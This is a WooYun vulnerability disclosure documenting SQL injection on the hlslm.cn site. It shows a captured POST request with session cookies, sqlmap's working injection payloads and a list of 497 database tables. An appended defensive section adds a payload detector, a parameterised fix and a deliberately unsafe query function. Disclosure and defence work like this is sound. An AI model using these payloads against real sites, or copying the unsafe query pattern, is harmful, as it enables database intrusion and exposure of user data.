Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0174843

Title: SQL injection vulnerability on the 好老师联盟 (hlslm.cn) main site

Affected vendor: hlslm.cn

Author: 路人甲

Submitted: 2016-02-17 12:43

Fix time: 2016-02-22 12:50

Published: 2016-02-22 12:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]


Vulnerability details

Disclosure status:

2016-02-17: details sent to the vendor; awaiting the vendor's handling
2016-02-22: the vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /Home/Teacher/ajax_page_comment HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.hlslm.cn/
Cookie: PHPSESSID=uuifmv0gfms25ihocpqabke5a3; where=0; userid=MDAwMDAwMDAwMA; looyu_id=4a42ce2895c61e8789659e8bfad168633d_47886%3A1; Hm_lvt_e3ffb67abfb33a0f3a329bc03d176c35=1454546295,1454546406,1454546428,1454546441; Hm_lpvt_e3ffb67abfb33a0f3a329bc03d176c35=1454546441; CNZZDATA1255216675=141508734-1454546299-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1454546299; looyu_47886=v%3A4a42ce2895c61e8789659e8bfad168633d%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor; now_city_id=300; now_city=%E8%A5%BF%E5%AE%89; JSESSIONID=62CC6049B50C7B04D98CECCB7E015F4D.server99; HMACCOUNT=4E7992CB717057BC; BAIDUID=A74E8A8E61040DD87FCB1196C5B665A7:FG=1; teacher_list=16814%2C19411; bdshare_firstime=1454546472940
Host: www.hlslm.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
page=2&teacher_id=17279

[Image: 1.png]

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: teacher_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=2&teacher_id=17279) AND 4563=4563 AND (5745=5745
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=2&teacher_id=17279) AND (SELECT * FROM (SELECT(SLEEP(5)))aoUl) AND (1233=1233
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: page=2&teacher_id=17279) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71716a7171,0x64424a714c756d5a7a6a,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
back-end DBMS: MySQL 5.0.12
Database: bbs_52qiuxue
[497 tables]
+--------------------------------------+
| pre_access |
| pre_active_active_zh |
| pre_active_changeusername |
| pre_active_city_website_hooks |
| pre_active_city_website_push_log |
| pre_active_city_website_setting |
| pre_active_lottery_chance_zh |
| pre_active_lottery_line_zh |
| pre_active_lottery_zh |
| pre_active_questionnaire |
| pre_active_questionnaire_users |
| pre_active_share_qq_log |
| pre_amy_user_setting |
| pre_appbyme_config |
| pre_appbyme_portal_module |
| pre_appbyme_portal_module_source |
| pre_appbyme_user_setting |
| pre_article |
| pre_baidusubmit_setting |
| pre_baidusubmit_sitemap |
| pre_baidusubmit_urlstat |
| pre_class |
| pre_class_order_extends |
| pre_class_order_list |
| pre_class_room |
| pre_class_room_assist |
| pre_class_time |
| pre_common_admincp_cmenu |
| pre_common_admincp_group |
| pre_common_admincp_member |
| pre_common_admincp_perm |
| pre_common_admincp_session |
| pre_common_admingroup |
| pre_common_adminnote |
| pre_common_advertisement |
| pre_common_advertisement_custom |
| pre_common_banned |
| pre_common_block |
| pre_common_block_favorite |
| pre_common_block_item |
| pre_common_block_item_data |
| pre_common_block_permission |
| pre_common_block_pic |
| pre_common_block_style |
| pre_common_block_xml |
| pre_common_cache |
| pre_common_card |
| pre_common_card_log |
| pre_common_card_type |
| pre_common_connect_guest |
| pre_common_credit_log |
| pre_common_credit_log_field |
| pre_common_credit_rule |
| pre_common_credit_rule_log |
| pre_common_credit_rule_log_field |
| pre_common_cron |
| pre_common_devicetoken |
| pre_common_district |
| pre_common_diy_data |
| pre_common_domain |
| pre_common_failedip |
| pre_common_failedlogin |
| pre_common_friendlink |
| pre_common_grouppm |
| pre_common_invite |
| pre_common_magic |
| pre_common_magiclog |
| pre_common_mailcron |
| pre_common_mailqueue |
| pre_common_member |
| pre_common_member_action_log |
| pre_common_member_connect |
| pre_common_member_count |
| pre_common_member_crime |
| pre_common_member_field_forum |
| pre_common_member_field_home |
| pre_common_member_forum_buylog |
| pre_common_member_grouppm |
| pre_common_member_log |
| pre_common_member_magic |
| pre_common_member_medal |
| pre_common_member_newprompt |
| pre_common_member_profile |
| pre_common_member_profile_bak |
| pre_common_member_profile_setting |
| pre_common_member_security |
| pre_common_member_secwhite |
| pre_common_member_stat_field |
| pre_common_member_status |
| pre_common_member_validate |
| pre_common_member_verify |
| pre_common_member_verify_info |
| pre_common_member_wechat |
| pre_common_member_wechatmp |
| pre_common_myapp |
| pre_common_myinvite |
| pre_common_mytask |
| pre_common_nav |
| pre_common_onlinetime |
| pre_common_optimizer |
| pre_common_patch |
| pre_common_plugin |
| pre_common_plugin_aliyunrec |
| pre_common_plugin_luckypacket |
| pre_common_plugin_luckypacketlog |
| pre_common_pluginvar |
| pre_common_process |
| pre_common_regip |
| pre_common_relatedlink |
| pre_common_remote_port |
| pre_common_report |
| pre_common_searchindex |
| pre_common_seccheck |
| pre_common_secquestion |
| pre_common_session |
| pre_common_setting |
| pre_common_setting2 |
| pre_common_setting_150805 |
| pre_common_setting_150807 |
| pre_common_smiley |
| pre_common_sphinxcounter |
| pre_common_stat |
| pre_common_statuser |
| pre_common_style |
| pre_common_stylevar |
| pre_common_syscache |
| pre_common_tag |
| pre_common_tagitem |
| pre_common_task |
| pre_common_taskvar |
| pre_common_template |
| pre_common_template_block |
| pre_common_template_permission |
| pre_common_uin_black |
| pre_common_usergroup |
| pre_common_usergroup_field |
| pre_common_verifycode |
| pre_common_visit |
| pre_common_word |
| pre_common_word_type |
| pre_connect_disktask |
| pre_connect_feedlog |
| pre_connect_memberbindlog |
| pre_connect_postfeedlog |
| pre_connect_tthreadlog |
| pre_day_forms |
| pre_dsu_paulsign |
| pre_dsu_paulsignemot |
| pre_dsu_paulsignset |
| pre_form |
| pre_forum_access |
| pre_forum_activity |
| pre_forum_activityapply |
| pre_forum_announcement |
| pre_forum_attachment |
| pre_forum_attachment_0 |
| pre_forum_attachment_1 |
| pre_forum_attachment_2 |
| pre_forum_attachment_3 |
| pre_forum_attachment_4 |
| pre_forum_attachment_5 |
| pre_forum_attachment_6 |
| pre_forum_attachment_7 |
| pre_forum_attachment_8 |
| pre_forum_attachment_9 |
| pre_forum_attachment_exif |
| pre_forum_attachment_unused |
| pre_forum_attachtype |
| pre_forum_bbcode |
| pre_forum_collection |
| pre_forum_collectioncomment |
| pre_forum_collectionfollow |
| pre_forum_collectioninvite |
| pre_forum_collectionrelated |
| pre_forum_collectionteamworker |
| pre_forum_collectionthread |
| pre_forum_creditslog |
| pre_forum_debate |
| pre_forum_debatepost |
| pre_forum_faq |
| pre_forum_filter_post |
| pre_forum_forum |
| pre_forum_forum_threadtable |
| pre_forum_forumfield |
| pre_forum_forumrecommend |
| pre_forum_groupcreditslog |
| pre_forum_groupfield |
| pre_forum_groupinvite |
| pre_forum_grouplevel |
| pre_forum_groupuser |
| pre_forum_hotreply_member |
| pre_forum_hotreply_number |
| pre_forum_imagetype |
| pre_forum_medal |
| pre_forum_medallog |
| pre_forum_memberrecommend |
| pre_forum_moderator |
| pre_forum_modwork |
| pre_forum_newthread |
| pre_forum_onlinelist |
| pre_forum_order |
| pre_forum_pinggu |
| pre_forum_poll |
| pre_forum_polloption |
| pre_forum_polloption_image |
| pre_forum_pollvoter |
| pre_forum_post |
| pre_forum_post_location |
| pre_forum_post_moderate |
| pre_forum_post_tableid |
| pre_forum_postcache |
| pre_forum_postcomment |
| pre_forum_postlog |
| pre_forum_poststick |
| pre_forum_promotion |
| pre_forum_ratelog |
| pre_forum_relatedthread |
| pre_forum_replycredit |
| pre_forum_rsscache |
| pre_forum_sofa |
| pre_forum_spacecache |
| pre_forum_statlog |
| pre_forum_thread |
| pre_forum_thread_moderate |
| pre_forum_threadaddviews |
| pre_forum_threadcalendar |
| pre_forum_threadclass |
| pre_forum_threadclosed |
| pre_forum_threaddisablepos |
| pre_forum_threadhidelog |
| pre_forum_threadhot |
| pre_forum_threadimage |
| pre_forum_threadlog |
| pre_forum_threadmod |
| pre_forum_threadpartake |
| pre_forum_threadpreview |
| pre_forum_threadprofile |
| pre_forum_threadprofile_group |
| pre_forum_threadrush |
| pre_forum_threadtype |
| pre_forum_trade |
| pre_forum_tradecomment |
| pre_forum_tradelog |
| pre_forum_typeoption |
| pre_forum_typeoptionvar |
| pre_forum_typevar |
| pre_forum_warning |
| pre_group |
| pre_group_class |
| pre_group_class_user |
| pre_home_access |
| pre_home_album |
| pre_home_album_category |
| pre_home_appcreditlog |
| pre_home_blacklist |
| pre_home_blog |
| pre_home_blog_category |
| pre_home_blog_moderate |
| pre_home_blogfield |
| pre_home_class |
| pre_home_click |
| pre_home_clickuser |
| pre_home_comment |
| pre_home_comment_moderate |
| pre_home_docomment |
| pre_home_doing |
| pre_home_doing_moderate |
| pre_home_favorite |
| pre_home_feed |
| pre_home_feed_app |
| pre_home_follow |
| pre_home_follow_feed |
| pre_home_follow_feed_archiver |
| pre_home_friend |
| pre_home_friend_request |
| pre_home_friendlog |
| pre_home_notification |
| pre_home_pic |
| pre_home_pic_moderate |
| pre_home_picfield |
| pre_home_poke |
| pre_home_pokearchive |
| pre_home_share |
| pre_home_share_moderate |
| pre_home_show |
| pre_home_specialuser |
| pre_home_surrounding_user |
| pre_home_userapp |
| pre_home_userappfield |
| pre_home_visitor |
| pre_invoice |
| pre_lev_login_auth_user |
| pre_lev_open_auth_user |
| pre_lev_open_login_user |
| pre_log |
| pre_mall_address |
| pre_mall_advertsion |
| pre_mall_advertsionswf |
| pre_mall_down_15 |
| pre_mall_down_data_15 |
| pre_mall_favorite |
| pre_mall_fields |
| pre_mall_list |
| pre_mall_order |
| pre_mall_relation |
| pre_mall_shopping |
| pre_mall_withdata |
| pre_mobile_setting |
| pre_mobile_wechat_authcode |
| pre_mobile_wechat_masssend |
| pre_mobile_wechat_resource |
| pre_mobile_wsq_threadlist |
| pre_moodwall |
| pre_myrepeats |
| pre_node |
| pre_node_operation |
| pre_picc |
| pre_plugin_admincp_per |
| pre_plugin_auction |
| pre_plugin_auction_message |
| pre_plugin_auction_xml |
| pre_plugin_auctionapply |
| pre_plugin_blessing |
| pre_plugin_formmanage_formlist |
| pre_portal_article_content |
| pre_portal_article_count |
| pre_portal_article_moderate |
| pre_portal_article_related |
| pre_portal_article_title |
| pre_portal_article_trash |
| pre_portal_attachment |
| pre_portal_category |
| pre_portal_category_permission |
| pre_portal_comment |
| pre_portal_comment_moderate |
| pre_portal_rsscache |
| pre_portal_topic |
| pre_portal_topic_pic |
| pre_resource_auth_group |
| pre_resource_auth_group_user |
| pre_role |
| pre_role_user |
| pre_role_user_copy |
| pre_security_evilpost |
| pre_security_eviluser |
| pre_security_failedlog |
| pre_send_sms_log |
| pre_teacher_admin_log |
| pre_teacher_area |
| pre_teacher_artice |
| pre_teacher_article |
| pre_teacher_auditiondata |
| pre_teacher_auditionlog |
| pre_teacher_auth_base |
| pre_teacher_auth_class |
| pre_teacher_auth_courses |
| pre_teacher_auth_experience |
| pre_teacher_auth_gold |
| pre_teacher_auth_index |
| pre_teacher_auth_info |
| pre_teacher_auth_log |
| pre_teacher_auth_success_case |
| pre_teacher_china |
| pre_teacher_collect |
| pre_teacher_comment |
| pre_teacher_commission_log |
| pre_teacher_consumption |
| pre_teacher_coupons |
| pre_teacher_coupons_auth |
| pre_teacher_coupons_send |
| pre_teacher_coupons_send_bak |
| pre_teacher_course_1 |
| pre_teacher_course_register |
| pre_teacher_course_time_1 |
| pre_teacher_course_type_1 |
| pre_teacher_courses |
| pre_teacher_courses_copy |
| pre_teacher_customer_call_log |
| pre_teacher_data_manage |
| pre_teacher_data_manage_channel |
| pre_teacher_data_manage_copy |
| pre_teacher_data_manage_log |
| pre_teacher_detail |
| pre_teacher_experience |
| pre_teacher_feedback |
| pre_teacher_fund_log |
| pre_teacher_home_work |
| pre_teacher_main |
| pre_teacher_member_bak |
| pre_teacher_member_log |
| pre_teacher_member_profile_bak |
| pre_teacher_message_reminder |
| pre_teacher_message_reminder_copy |
| pre_teacher_msg_list |
| pre_teacher_msg_log |
| pre_teacher_need |
| pre_teacher_need_accept |
| pre_teacher_need_copy |
| pre_teacher_need_copy1 |
| pre_teacher_need_log |
| pre_teacher_need_order_detaill |
| pre_teacher_need_status |
| pre_teacher_need_tip |
| pre_teacher_order |
| pre_teacher_order_consumption_log |
| pre_teacher_order_copy |
| pre_teacher_parm |
| pre_teacher_pay_log |
| pre_teacher_plan |
| pre_teacher_plan_content |
| pre_teacher_points |
| pre_teacher_proportion_rules |
| pre_teacher_propotion_isopen |
| pre_teacher_qrcode |
| pre_teacher_qrcode_group |
| pre_teacher_resources_manage |
| pre_teacher_send_sms_log |
| pre_teacher_sign |
| pre_teacher_sign_log |
| pre_teacher_statistics |
| pre_teacher_student_base |
| pre_teacher_student_base_copy |
| pre_teacher_student_class_feedback |
| pre_teacher_student_contact |
| pre_teacher_student_sign_feedback |
| pre_teacher_student_statistics |
| pre_teacher_success_case |
| pre_teacher_teacher_base |
| pre_teacher_teacher_comment |
| pre_teacher_teacher_extend |
| pre_teacher_teacher_inside_comment |
| pre_teacher_tp_admin_log |
| pre_teacher_tp_appointment |
| pre_teacher_tp_appointment_copy |
| pre_teacher_tp_area |
| pre_teacher_tp_index |
| pre_teacher_tp_pay_log |
| pre_teacher_tp_type |
| pre_teacher_tp_user_comments |
| pre_teacher_tp_user_false_data |
| pre_teacher_tp_user_false_parm |
| pre_teacher_tp_user_feedback |
| pre_teacher_umemberfields_bak |
| pre_teacher_umembers_bak |
| pre_teacher_user_comment |
| pre_teacher_wechat_audition_send_log |
| pre_teacher_wechat_send_log |
| pre_teacher_wrong_log |
| pre_teacher_wxvote |
| pre_teacher_wxvote_people |
| pre_teachers_teachers_extends |
| pre_ucenter_admins |
| pre_ucenter_amy_pm_heart |
| pre_ucenter_applications |
| pre_ucenter_badwords |
| pre_ucenter_domains |
| pre_ucenter_failedlogins |
| pre_ucenter_feeds |
| pre_ucenter_friends |
| pre_ucenter_mailqueue |
| pre_ucenter_memberfields |
| pre_ucenter_members |
| pre_ucenter_members_copy2 |
| pre_ucenter_mergemembers |
| pre_ucenter_newpm |
| pre_ucenter_notelist |
| pre_ucenter_pm_indexes |
| pre_ucenter_pm_lists |
| pre_ucenter_pm_members |
| pre_ucenter_pm_messages_0 |
| pre_ucenter_pm_messages_1 |
| pre_ucenter_pm_messages_2 |
| pre_ucenter_pm_messages_3 |
| pre_ucenter_pm_messages_4 |
| pre_ucenter_pm_messages_5 |
| pre_ucenter_pm_messages_6 |
| pre_ucenter_pm_messages_7 |
| pre_ucenter_pm_messages_8 |
| pre_ucenter_pm_messages_9 |
| pre_ucenter_protectedmembers |
| pre_ucenter_settings |
| pre_ucenter_sqlcache |
| pre_ucenter_tags |
| pre_ucenter_vars |
| pre_user |
| pre_wechat_log |
| pre_weixin_binding |
| pre_weixin_dy_back |
| pre_weixin_dy_log |
| pre_weixin_http_log |
| pre_weixin_log |
| pre_weixin_parm |
| pre_weixin_push |
| pre_weixin_qy_log |
| pre_will_log |
| sms_recv |
| sms_send |
+--------------------------------------+

Proof of vulnerability:

Remediation:
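The report leaves the remediation section empty. The block below is an added example, not code from the vendor or the report's author, showing the two layers a defender would want on the ajax_page_comment endpoint: a detector that flags the three payload shapes sqlmap confirmed (boolean-based, time-based, UNION) in form-encoded request bodies, and a hardened handler that allow-lists `page` and `teacher_id` as integers and then binds them as query parameters instead of concatenating them. The table name `teacher_comment`, the in-memory SQLite schema, and all function names are assumptions; the sample bodies reuse the payloads quoted in the sqlmap output above.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Constructed sample request bodies: the benign request from the report plus the
# three sqlmap payloads it lists for the teacher_id parameter.
SAMPLE_BODIES = [
    "page=2&teacher_id=17279",
    "page=2&teacher_id=17279) AND 4563=4563 AND (5745=5745",
    "page=2&teacher_id=17279) AND (SELECT * FROM (SELECT(SLEEP(5)))aoUl) AND (1233=1233",
    "page=2&teacher_id=17279) UNION ALL SELECT NULL,NULL,NULL,NULL,"
    "CONCAT(0x71716a7171,0x64424a714c756d5a7a6a,0x717a707071),"
    "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--",
]

# Allow-list: the only parameters this endpoint takes, and the only shape they may have.
INTEGER_PARAMS = ("page", "teacher_id")
INTEGER_RE = re.compile(r"\d{1,10}")

# Signatures of the three techniques sqlmap confirmed against this parameter.
SIGNATURES = {
    "boolean-based": re.compile(r"\b(AND|OR)\s+\(?\d+\s*=\s*\d+", re.I),
    "time-based": re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
}


def classify_body(body):
    """Return {param: [labels]} for each integer parameter whose value is not a plain integer.

    Labels name the technique(s) recognised; a value that is merely non-numeric gets
    the label "non-numeric". A clean body returns {}.
    """
    findings = {}
    params = parse_qs(body, keep_blank_values=True)
    for name in INTEGER_PARAMS:
        for value in params.get(name, []):
            if INTEGER_RE.fullmatch(value):
                continue
            labels = [label for label, rx in SIGNATURES.items() if rx.search(value)]
            findings[name] = labels or ["non-numeric"]
    return findings


def build_query_unsafe(teacher_id_raw):
    """The concatenation pattern the '(teacher_id = N)' payload shape implies. Do not use."""
    return "SELECT id, body FROM teacher_comment WHERE (teacher_id = " + teacher_id_raw + ")"


def fetch_comments(conn, page_raw, teacher_id_raw, page_size=10):
    """Hardened handler: validate against the allow-list, then bind values as parameters."""
    for name, value in (("page", page_raw), ("teacher_id", teacher_id_raw)):
        if not INTEGER_RE.fullmatch(value):
            raise ValueError(f"{name} must be a positive integer")
    page, teacher_id = int(page_raw), int(teacher_id_raw)
    if page < 1:
        raise ValueError("page must be >= 1")
    # Placeholders: the driver sends the values separately; they are never parsed as SQL.
    cur = conn.execute(
        "SELECT id, body FROM teacher_comment WHERE teacher_id = ? "
        "ORDER BY id LIMIT ? OFFSET ?",
        (teacher_id, page_size, (page - 1) * page_size),
    )
    return cur.fetchall()


def demo_db():
    """In-memory SQLite stand-in for the site's MySQL table (constructed, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE teacher_comment (id INTEGER PRIMARY KEY, teacher_id INTEGER, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO teacher_comment (teacher_id, body) VALUES (?, ?)",
        [(17279, f"comment {i}") for i in range(1, 16)] + [(1, "other teacher")],
    )
    return conn


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body[:60], "->", classify_body(body) or "clean")
    print(fetch_comments(demo_db(), "2", "17279"))
```

The detector is useful at a WAF or in a request-logging middleware, since web server access logs normally do not record POST bodies; the integer allow-list alone already rejects every payload in the report, and the signature labels only add context for triage. The parameterised query is the actual fix: even if validation were bypassed, a bound value cannot close the parenthesis or append a UNION.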

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2016-02-22 12:50

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet